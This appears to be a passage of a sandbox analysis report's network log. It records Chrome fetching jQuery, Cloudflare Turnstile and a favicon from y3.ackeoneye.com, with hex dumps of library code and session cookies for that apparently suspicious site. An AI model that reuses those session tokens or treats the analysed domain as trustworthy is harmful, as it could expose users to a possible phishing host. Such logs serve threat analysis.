                                                                                                                                  2025-01-27 14:44:58 UTC1369INData Raw: 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f 68 61
                                                                                                                                  Data Ascii: (t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._ha
                                                                                                                                  2025-01-27 14:44:58 UTC1369INData Raw: 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d 29
                                                                                                                                  Data Ascii: (m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50])


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  10192.168.2.549727151.101.194.1374433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:44:57 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                  Host: code.jquery.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: */*
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:44:58 UTC613INHTTP/1.1 200 OK
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 89501
                                                                                                                                  Server: nginx
                                                                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                  ETag: "28feccc0-15d9d"
                                                                                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Date: Mon, 27 Jan 2025 14:44:58 GMT
                                                                                                                                  Age: 1742184
                                                                                                                                  X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740032-EWR
                                                                                                                                  X-Cache: HIT, HIT
                                                                                                                                  X-Cache-Hits: 2774, 3
                                                                                                                                  X-Timer: S1737989098.020631,VS0,VE0
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  2025-01-27 14:44:58 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                  2025-01-27 14:44:58 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                                                  Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                                                  2025-01-27 14:44:58 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                                                  Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                                                  2025-01-27 14:44:58 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                                                  Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                                                  2025-01-27 14:44:58 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                                                  Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                                                  2025-01-27 14:44:58 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                                                  Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                                                  2025-01-27 14:44:58 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                                                  Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                                                  2025-01-27 14:44:58 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                                                  Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                                                  2025-01-27 14:44:58 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                                                  Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                                                  2025-01-27 14:44:58 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                                                  Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  11192.168.2.549721104.21.93.2284433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:44:58 UTC1316OUTGET /favicon.ico HTTP/1.1
                                                                                                                                  Host: y3.ackeoneye.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                  Referer: https://y3.ackeoneye.com/lo92/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkRXeWRhL1VkbnhPS2dxL2YwbGhuZEE9PSIsInZhbHVlIjoiYkwvQmR0anI0QjFsRUJ5RkEza0wyRFYyVFhmV0ovT1Z5TzBnUHNYaHpWTXQ1NWNvcU1KWlBJdnVjckVzZEZDcWhsREg0ekVIamxSUHVjbzBWMnVQTmJIQzVHNlVDVmNDMHBwQXhQWmJGeitYay84UVlKcDZMd2U4d29CSGpOUjgiLCJtYWMiOiJjNmUyZTAyZWY1MzZhNWNhODY0YzM5ZDNkMTk1YzIzOGRlNzgwZTRiZjM3ZGJkM2Y0MGM3ZTg2MGQxMTkyNTIxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhJWkIzV3FlWHlmanhkdndvWVpIbHc9PSIsInZhbHVlIjoicm94dEpFWFFjbERHU3hKQS90Wm5zMjArQWE2WVNFYm5FajBKLytlTU5Md3QyemVIVmJub0lZa0tRTzBHWTQxb1I3Z3YxTFJhMGRmODJiNXR5TU02OWhRNTdXaUFZSXBNUnMwZEZxT093Wis5M2ROS1NyZWFwZjNPTXMzSnY2Y0YiLCJtYWMiOiJiZDg0YzJiNWE3NDIwZTA0N2Q4N2NlOTc0ZGZiMTVmODkyMWQ1ZmM4MTk3NWViZDQ4ZjA1MTE2MmYzYjQ1ZWViIiwidGFnIjoiIn0%3D
                                                                                                                                  2025-01-27 14:44:58 UTC1080INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 27 Jan 2025 14:44:58 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=14400
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F6ROHfEAEbc7x2dx%2BM4cZ7exDP81u%2Fj9itd0a6%2FlwJi0JyF1ZCOaeigw7ngWXDI4TdWYPFVGNjq1YGj0Wuw%2BlPX7TbIzxXnibU207UDQ7VpFUj2wLIGCNPAqU7%2FluwfYNodH4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=801&min_rtt=793&rtt_var=238&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1148&delivery_rate=4848920&cwnd=252&unsent_bytes=0&cid=57e550caeea798d9&ts=404&x=0"
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 2485
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 90898617cd2e8ca8-EWR
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2357&min_rtt=2314&rtt_var=955&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1894&delivery_rate=1096507&cwnd=164&unsent_bytes=0&cid=c4b22d9dd97ae036&ts=2660&x=0"
                                                                                                                                  2025-01-27 14:44:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  12192.168.2.549729104.18.95.414433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:44:58 UTC383OUTGET /turnstile/v0/b/725bd36e298b/api.js HTTP/1.1
                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: */*
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:44:58 UTC471INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 27 Jan 2025 14:44:58 GMT
                                                                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                                                                  Content-Length: 48121
                                                                                                                                  Connection: close
                                                                                                                                  accept-ranges: bytes
                                                                                                                                  last-modified: Tue, 21 Jan 2025 23:46:19 GMT
                                                                                                                                  cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                  access-control-allow-origin: *
                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 9089861b6ae741f5-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  2025-01-27 14:44:58 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 73 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 61 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 74 28 73 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 6a 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 74 2c 61 29 3b 66 75 6e 63 74
                                                                                                                                  Data Ascii: "use strict";(function(){function Bt(e,t,a,o,c,l,g){try{var h=e[l](g),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function jt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);funct
